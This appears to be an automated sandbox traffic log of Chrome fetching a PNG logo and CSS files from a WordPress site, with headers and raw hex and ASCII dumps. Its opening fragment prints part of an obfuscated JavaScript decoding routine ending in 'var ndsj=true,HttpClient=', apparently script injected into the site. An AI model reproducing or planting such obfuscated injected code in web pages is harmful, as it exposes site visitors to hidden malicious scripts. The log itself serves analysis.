                                                            2025-01-15 10:07:58 UTC1324INData Raw: 73 65 49 6e 74 28 44 28 30 78 65 62 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 32 27 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 64 62 27 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 39 27 29 29 2a 2d 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 35 27 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 44 28 30 78 65 64 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 65 38 27 29 29 3b 69 66 28 7a 3d 3d 3d 65 29 62 72 65 61 6b 3b 65 6c 73 65 20 72 5b 27 70 75 73 68 27 5d 28 72 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 69 29 7b 72 5b 27 70 75 73 68 27 5d 28 72 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 71 2c 30 78 65 38 31 31 31 29 29 3b 76 61 72 20 6e 64 73 6a 3d 74 72 75 65 2c 48 74 74 70 43 6c 69 65 6e 74 3d
                                                            Data Ascii: seInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.1649742178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC645OUTGET /wp-content/uploads/2016/04/logo_new2.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC258INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:01 GMT
                                                            ETag: "1206e-620a8e5c3410b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 73838
                                                            Content-Type: image/png
                                                            2025-01-15 10:07:58 UTC7934INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b0 00 00 00 f0 08 06 00 00 01 16 66 01 64 00 00 00 09 70 48 59 73 00 00 0e 26 00 00 0e 26 01 a2 ef 25 fc 00 00 20 00 49 44 41 54 78 9c ec 5d 07 78 54 45 d7 be db 7b 3a 81 84 96 d0 91 ae 80 0a 22 fc 96 0f 1b 48 51 10 41 c4 82 88 20 4d a9 7e 82 22 82 52 45 a9 22 e2 07 28 82 a0 14 0b 58 90 2e 08 d2 41 3a 81 14 12 d2 b3 bd ff e7 bd f7 4e 72 b3 d9 14 42 68 ca 79 9e cd 6e 6e 9d 99 33 a7 9f 39 a3 f4 fb fd dc 3f 11 94 37 ba 01 d7 0a ae ba 63 84 71 b9 4c 2e f7 7a 5c 2e 35 27 93 f9 95 4a a5 a7 22 1a 76 b5 70 d5 1d 73 3a 1c 1a 2d 7d 67 e7 e4 84 a9 54 2a b7 d1 68 b4 dc 0c 9d bb f2 8e f9 fd 32 4e 2e f7 79 1d 0e 83 cd 6e 57 9b c2 c3 b3 71 b8 52 74 f4 e5 c3 87 0e 35 ab 54 a9 52 7a 4c 6c 6c 8a dd 66 d3 a3 a3 37 aa
                                                            Data Ascii: PNGIHDRfdpHYs&&% IDATx]xTE{:"HQA M~"RE"(X.A:NrBhynn39?7cqL.z\.5'J"vps:-}gT*h2N.ynWqRt5TRzLllf7
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 09 a5 07 0a 0b 1f 61 a7 fe e1 7d 90 41 38 0e d7 19 d8 1b c6 84 29 24 f8 c6 33 a8 0f 2e 4c 4c 31 43 cc 2e ae 7c f1 88 89 e7 e5 f0 d6 97 01 80 3c a4 f5 23 51 9d 5e 2a b5 f6 f2 ad 76 9f cb 25 f7 bb dc 72 16 33 90 c9 f9 0c 7a 85 45 5c f2 c6 40 91 9b ab d6 c0 f8 25 db 04 ac 0d b6 49 54 64 64 a6 d1 24 d4 80 06 65 71 7c 3e b8 5c 74 b4 ca f2 1d b3 52 41 2f f0 7e a1 84 10 fe f7 fb 95 2e 20 d0 e3 31 a0 3a b1 42 28 4e 28 68 69 85 a3 d3 42 32 bc f0 2e 9f 82 fd 96 09 d9 f0 32 c9 ff 7c 37 38 21 15 42 74 3a 0b 4a 82 a0 61 72 72 76 8e b1 3e a6 55 8a f2 d9 27 be d3 2b d4 60 e2 1d d0 62 42 3d 57 e2 f2 f6 ab 45 98 8f 93 24 df cb 02 12 d0 d9 ff c4 43 a0 69 16 3a e7 75 b9 35 2a 62 71 d2 63 8a 7d fb a2 a1 2e 71 bc a7 42 e9 57 93 8a 8d 65 7b 7a bd ce 76 2b 46 87 af 05 dc b8 cc
                                                            Data Ascii: a}A8)$3.LL1C.|<#Q^*v%r3zE\@%ITdd$eq|>\tRA/~. 1:B(N(hiB2.2|78!Bt:Jarrv>U'+`bB=WE$Ci:u5*bqc}.qBWe{zv+F
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 56 a7 4e fd 2b f0 d5 dc df 49 49 97 89 b8 5c 52 c2 82 5b 9e 11 58 cb ba 75 ab 36 15 97 bf 5c 0d 28 1e 78 60 64 5d 8e 1b 59 e2 45 7a bd 3b 29 31 b1 3a 4f d4 36 9b be 40 aa 29 7c ac e2 19 aa ab c9 15 05 2a ab 58 f7 e9 36 91 5d 63 b8 7a 02 83 fa 87 38 0f 26 b7 cf 77 54 d1 a2 c5 25 ee c0 81 98 0a 68 5b d9 20 27 47 73 5f bb 76 db 6d 53 a7 fe f2 5b 83 06 9f 08 4d 12 08 0d df ad e3 e2 ea d7 6a d7 ae 42 89 0b b0 74 d9 b2 e7 50 c9 9b 65 69 b0 4d 05 aa 56 a9 a2 e9 de b3 e7 75 db d6 64 df de bd ad f8 ad 8f c9 f6 64 9b ef c0 fd 2f 7c fb 84 e4 64 48 3e a8 8b f2 82 8d 80 ae 57 fb fe ed 50 21 2a a2 e8 b4 40 04 55 e1 de b5 ab 99 76 e4 c8 b5 dc 9c 39 6d 4a bf b9 e2 40 3f 6a d4 c3 9d 38 ee e1 eb f9 ce f9 0b 16 bc 7a c5 37 69 34 de 9c 59 b3 7e 3a 58 bf fe f7 89 c9 c9 36 30
                                                            Data Ascii: VN+II\R[Xu6\(x`d]YEz;)1:O6@)|*X6]cz8&wT%h[ 'Gs_vmS[MjBtPeiMVudd/|dH>WP!*@Uv9mJ@?j8z7i4Y~:X60
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 8a 58 00 b1 a1 f8 ac 28 0a 56 54 aa a2 f8 ac a0 62 41 44 11 14 44 01 45 45 45 11 a4 89 4a 91 1e 42 08 e9 21 ed fa ed be f9 66 76 f6 e6 36 77 97 4a 42 c8 fe 7f 2c 77 d9 db 9d 9d dd 9d 6f be 32 5f 51 bd 21 9c 4e dc 98 88 14 b7 1b 9e ba 82 a7 49 85 8a 72 26 18 38 7e 41 0d bd 27 9e 07 98 10 dc a4 32 49 84 ce 36 69 52 02 9c 0a a9 3e 6d 44 87 c3 2f 03 2c 79 0e 87 dd 49 fd e6 1c 2e 2c c2 79 a9 df 9c a4 0d 04 b5 8f 92 9a 61 57 a0 6b ba 82 fa 72 a9 ff 9b 7a ff 21 79 f8 42 c5 51 81 11 a1 e6 45 40 ea 7c a9 e7 6a fd 54 07 16 1e e8 22 73 e9 81 49 8a 11 14 10 3a f3 b6 47 24 4f 3d e1 3a 5a d6 5a d6 86 da b7 00 ef b5 a0 28 c1 bc f7 ea 62 2e cb f9 21 51 e2 a3 44 c1 e5 af d0 74 3f 85 cb f3 11 5c 24 a6 6d b0 a1 c0 da 0b 12 23 73 56 0e e6 89 0f 12 98 2c b1 45 72 7a ae e6 c5
                                                            Data Ascii: X(VTbADDEEEJB!fv6wJB,wo2_Q!NIr&8~A'2I6iR>mD/,yI.,yaWkrz!yBQE@|jT"sI:G$O=:ZZ(b.!QDt?\$m#sV,Erz
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 0f 26 22 46 21 30 13 23 30 26 26 46 3a 16 10 6d 00 3f fd f4 d3 37 dd 7a eb ad ff a8 3a 2a 89 6b 64 1c 36 dc f1 03 07 0e dc 81 fb 6d c9 cc cc 0c 7b ad 5b 6e b9 e5 ba 45 8b 3e 5a c5 a2 06 78 02 db b9 73 67 52 f8 fe f9 cb 24 b0 53 41 64 55 cd c9 a1 a8 99 7d 65 28 55 84 39 19 fc 05 d3 a6 a8 f8 7c 82 15 6f f0 89 ef 0e 33 7b 3f 59 9c 16 b0 fe 85 39 19 c4 75 58 40 67 c3 7a 18 c4 da f8 c9 03 52 59 35 7c 6f dc a8 91 bd ed 84 09 a7 2d 71 01 1c 7b f6 c4 a3 ab ae 0a d9 87 89 22 e0 76 bb 23 ea 2a cf 3c f3 cc e0 99 33 67 ae e4 45 44 3e af 3d 23 36 b6 01 c1 31 91 12 06 80 d3 e9 2a 09 d7 2e 98 ee 97 2e 5d 3a f3 3f ff f9 cf b3 8c 73 c5 c6 c6 0e c3 d7 ea 1f a9 2f d1 38 18 1b b0 d0 1f b8 2e bb 7e a4 b6 a2 71 cb cd 9b 37 37 7e e0 81 07 1a e4 e7 e7 17 21 55 fa 81 63 17 2e 5c
                                                            Data Ascii: &"F!0#0&&F:m?7z:*kd6m{[nE>ZxsgR$SAdU}e(U9|o3{?Y9uX@gzRY5|o-q{"v#*<3gED>=#61*..]:?s/8.~q77~!Uc.\
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 5f 5c 98 9b 9b bf 19 b2 43 81 91 65 d7 ae 5d 8f bc f5 d6 5b 37 60 2e fb 25 0c a7 8c 8c 2c cf c6 8d 9b 2f d9 bf 7f ef 5d b8 bf 3d ef b8 e3 8e 1f 24 c9 bc d2 e7 f3 5c d3 bc 79 f3 23 d9 d9 b9 62 5e 5e c1 e6 07 1e 78 60 cb a8 51 a3 7e 82 c8 1a d0 31 83 61 2e 48 d8 bf 7f ff 95 eb d7 af bf ad 67 cf de 2f eb 6c 83 40 80 e0 d7 09 ba 36 c2 63 07 d2 20 90 ad 52 f2 21 3a 75 04 c6 40 4d f7 aa 59 56 15 b7 64 20 2c cc c5 90 80 65 f3 8c eb af 7f 3c 90 9b 6b 8d 4b 48 b0 02 71 59 b0 58 e9 c5 5c c9 db a4 09 21 26 cc e2 c1 74 46 39 97 db 4d fe f6 63 3d 34 40 0d 2b e8 40 76 76 51 42 7c bc 10 90 15 b2 c6 8d e5 11 24 88 34 3c 9d e4 54 c0 93 98 19 2b cd 84 13 88 82 1f 41 0a 68 3c 00 03 90 2c 25 10 b9 e2 2b 7e d0 1e 66 da 0f 1a 48 48 be 3e cd 53 3d 18 ca 41 89 9b 66 e4 f5 9b 7f
                                                            Data Ascii: _\Ce][7`.%,/]=$\y#b^^x`Q~1a.Hg/l@6c R!:u@MYVd ,e<kKHqYX\!&tF9Mc=4@+@vvQB|$4<T+Ah<,%+~fHH>S=Af
                                                            2025-01-15 10:07:58 UTC8000INData Raw: ac f8 9f 2d 5b fe 1b 77 e7 9d bd 6b fb 1e aa 1b fe e5 cb 17 ee e9 d4 e9 55 fc 32 65 93 d7 6b e1 99 7a e9 f8 37 11 7f 57 64 de 53 51 63 72 88 d0 11 71 06 11 a5 e0 ef 24 d8 5a 44 5a ac 99 61 46 34 70 26 a1 b6 4d 88 74 82 06 a7 0b f0 fe 0a 06 0f 03 25 8a be c4 c4 f5 e6 f5 eb 67 a2 a1 43 1f af cd 6e d6 14 ac cf 3d 37 64 04 42 43 bc b7 de fa f7 9e 89 13 e7 a5 1c 3f 9e cf 7e d3 07 3f c3 76 7e 72 f2 c0 56 a3 46 dd 8d f2 f3 ad b5 d9 ef 8a a0 e3 87 1f b6 7d 57 92 6e 5b 3f 67 ce cf 2b 52 52 76 f1 8c 4a cf b8 2e 6c df be 4b cf 27 9e 18 6d da b5 ab 61 6d f7 bb ba e1 7f ea a9 9f fe bc fa ea 27 b0 60 e2 97 7c 3e b3 24 99 02 c1 14 57 40 06 01 04 f9 87 41 b3 82 7d b0 61 32 d1 2a 4c f3 09 8a 25 95 a1 41 bb 1a d3 12 82 eb 60 b5 7c ab 06 0c 9c 32 d4 be 06 06 84 e7 f7 53 0f
                                                            Data Ascii: -[wkU2ekz7WdSQcrq$ZDZaF4p&Mt%gCn=7dBC?~?v~rVF}Wn[?g+RRvJ.lK'mam'`|>$W@A}a2*L%A`|2S
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 1f 48 78 0d 52 ee 5c 90 58 ef cf cf cf df ab 75 61 c8 60 ba 76 ed 7a 06 30 a6 e7 73 73 73 77 46 7a 0f 5a 27 d1 e9 39 4c ed d6 ec 7f bb d7 a4 08 60 56 67 0b 95 1c f4 7d ea 94 00 cc 5f bb f7 de 7b 47 3d f1 c4 13 27 9c 79 e6 99 4f 41 79 52 f6 be 12 9b 46 27 9e 78 62 ae df df 60 78 95 31 67 99 c2 cf 3e fb 6c b7 26 c9 be 7d fb 96 d6 d7 fb 1b e8 66 9c 74 43 4e 53 0b d5 19 80 91 31 0a 4d 8b 7e 56 21 f7 80 01 03 72 df 79 e7 9d dd 86 04 83 fa d8 81 69 62 5d 89 6d bf 77 a5 dd 33 c2 05 f0 73 e7 ce 7d 1a 84 a7 3c ce c0 f1 cc fb 26 3d 24 9d 2f 60 97 e5 b0 0e da f2 97 b3 67 cf fe 71 e1 c2 85 d7 7e f0 c1 07 7b 1d 41 a6 31 42 c0 f9 cf 7f fe b3 a0 ba ba e6 ab 9d 3b f3 10 a8 48 47 54 c8 be 76 d4 8f 06 f3 76 c6 19 67 14 81 36 da 61 77 e9 f5 eb d7 af 10 d7 f5 61 59 f8 99 87
                                                            Data Ascii: HxR\Xua`vz0ssswFzZ'9L`Vg}_{G='yOAyRF'xb`x1g>l&}ftCNS1M~V!ryib]mw3s}<&=$/`gq~{A1B;HGTvvg6awaY
                                                            2025-01-15 10:07:58 UTC8000INData Raw: f8 dc 8b 2f be f8 c1 b9 e7 9e 77 3f 80 22 d1 3a 86 0e bd 68 62 71 71 71 06 00 d6 d9 e2 73 20 00 9c d6 af df 59 5f 24 26 fa fa 3a 81 57 61 61 e1 f0 9a 9a fa 95 2e 97 0c da 8f 5f 3f e6 98 5e 2b d6 ae 5d ff dc a4 49 0f bf 37 67 ce 9c e3 c5 67 b1 0e 40 20 48 60 d7 11 6d 9a 9a 9a 1a 04 90 eb 07 79 2a 63 da b0 9c 9f 5f 88 17 3e 2c 6b 61 21 b6 95 f4 35 68 d7 38 35 62 01 b0 23 8e 38 a2 b4 65 cb ac b7 51 d1 05 81 04 1d 89 3c d8 8f c3 e1 90 65 49 07 07 24 61 b3 52 ce af 35 6a 42 a4 7b aa 61 ac 09 ba be 90 58 ce 22 56 48 ed 0f 3a d0 00 86 64 07 31 5e 41 e4 90 a1 d2 58 af d3 f5 c4 44 dc 8f 81 ee 2f 40 37 cf a1 0c 24 31 31 ec ca c8 40 9b 83 5b 2d 2d 75 ab 09 09 6e 57 5d 9d ea 49 4c 74 e3 7a 0e 9c e7 f2 c1 81 67 04 b1 60 42 82 27 58 53 e3 09 ea 3a 3d 60 30 a2 46 96 90
                                                            Data Ascii: /w?":hbqqqs Y_$&:Waa._?^+]I7gg@ H`my*c_>,ka!5h85b#8eQ<eI$aR5jB{aX"VH:d1^AXD/@7$11@[--unW]ILtzg`B'XS:=`0F
                                                            2025-01-15 10:07:58 UTC1904INData Raw: b4 82 2b ff 1e fe 15 40 c5 21 1f 62 fe ad 42 96 13 58 f1 b6 e5 cf da 04 2f cb 06 a9 d6 7a 30 eb 88 a7 2f 16 d3 e1 de 7e a3 bf 23 80 91 de 2c 99 36 5a 59 b8 cf 49 c4 2e 49 78 26 82 e4 dd 8c 22 bb c4 18 2d 19 82 83 dc c1 c3 e7 23 e6 43 0c 2a 6b e9 05 78 4f 88 9e 61 a0 b0 db 65 80 97 90 31 74 66 42 cd 0b dd d5 5c 12 59 7b aa a3 9d 8f 38 08 64 b6 c9 f4 4a b9 b9 69 52 13 49 ae af 27 1a 18 ad 40 fe d9 28 26 39 89 6a 64 1c d0 c4 c3 cd a2 bb 7b ec 20 e6 32 1d 1f 48 19 23 cc 32 d1 aa d3 ba fa df 0e 28 22 23 6f b4 7c 82 24 6b 7f d6 aa f9 39 bd eb 9c b6 c0 74 f9 95 23 f3 37 9f 31 19 22 9d 7f d5 65 3b 33 b7 99 d6 14 f3 fd c8 fe 26 32 35 93 41 19 bf 36 5a 16 1b a0 71 bb a1 23 48 da ee 3b 00 ae f5 63 3c 29 5b 1d 44 58 3b 22 bf e7 98 e5 a8 65 61 39 73 7c c6 4c 57 04 71
                                                            Data Ascii: +@!bBX/z0/~#,6ZYI.Ix&"-#C*kxOae1tfB\Y{8dJiRI'@(&9jd{ 2H#2("#o|$k9t#71"e;3&25A6Zq#H;c<)[DX;"ea9s|LWq


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.1649739178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC609OUTGET /wp-content/themes/salient/css/box-roll.css?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:59 GMT
                                                            ETag: "32b4-620a8e93919a2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 12980
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:58 UTC7913INData Raw: 62 6f 64 79 2e 62 6f 78 2d 72 6f 6c 6c 69 6e 67 2c 0a 62 6f 64 79 5b 64 61 74 61 2d 66 6f 6f 74 65 72 2d 72 65 76 65 61 6c 3d 22 31 22 5d 2e 61 73 63 65 6e 64 2e 62 6f 78 2d 72 6f 6c 6c 69 6e 67 2c 0a 62 6f 64 79 5b 64 61 74 61 2d 66 6f 6f 74 65 72 2d 72 65 76 65 61 6c 3d 22 31 22 5d 2e 62 6f 78 2d 72 6f 6c 6c 69 6e 67 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 34 65 34 65 34 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 2c 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 20 23 61 6a 61 78 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 20 7b 0a 09 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 7d 0a 0a 68 74 6d 6c 20 7b 0a 09 6d 61 72 67 69
                                                            Data Ascii: body.box-rolling,body[data-footer-reveal="1"].ascend.box-rolling,body[data-footer-reveal="1"].box-rolling {background-color: #e4e4e4!important;}.container-wrap, .container-wrap .main-content, #ajax-content-wrap {min-height: 100%;}html {margi
                                                            2025-01-15 10:07:58 UTC5067INData Raw: 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 65 61 73 65 2d 6f 75 74 3b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 35 25 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 2d 33 30 30 70 78 29 20 72 6f 74 61 74 65 58 28 35 35 64 65 67 29 3b 20 7d 0a 09 31 30 30 25 20 7b 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 25 29 20 72 6f 74 61 74 65 58 28 39 30 64 65 67 29 3b 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 43 75 62 65 54 6f 70 4f 75 74 20 7b 0a 09 30 25 20 7b 20 20 7d 0a 09 36 35 25 20 7b 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 65 61 73 65 2d 6f 75 74
                                                            Data Ascii: timing-function: ease-out; -webkit-transform: translateY(-55%) translateZ(-300px) rotateX(55deg); }100% { -webkit-transform: translateY(-100%) rotateX(90deg); }}@keyframes rotateCubeTopOut {0% { }65% { -webkit-animation-timing-function: ease-out


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.1649741178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC631OUTGET /wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:03 GMT
                                                            ETag: "2bf8-620a930fc7bfd"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11256
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:58 UTC7913INData Raw: 2e 6d 65 6a 73 2d 6f 66 66 73 63 72 65 65 6e 7b 62 6f 72 64 65 72 3a 30 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 35 30 25 29 3b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c
                                                            Data Ascii: .mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-container{background:#000;font-family:Helvetica,Arial
                                                            2025-01-15 10:07:58 UTC3343INData Raw: 75 6d 65 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 34 70 78 20 34 70 78 7d 2e 6d 65 6a 73 2d 76 6f 6c 75 6d 65 2d 74 6f 74 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 35 29 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 38 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 77 69 64 74 68 3a 32 70 78 7d 2e 6d 65
                                                            Data Ascii: ume-button:hover{border-radius:0 0 4px 4px}.mejs-volume-total{background:hsla(0,0%,100%,.5);height:100px;left:50%;margin:0;position:absolute;top:8px;-webkit-transform:translateX(-50%);-ms-transform:translateX(-50%);transform:translateX(-50%);width:2px}.me


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.1649740178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC618OUTGET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC278INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:04 GMT
                                                            ETag: "105a-620a931097c0b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 4186
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
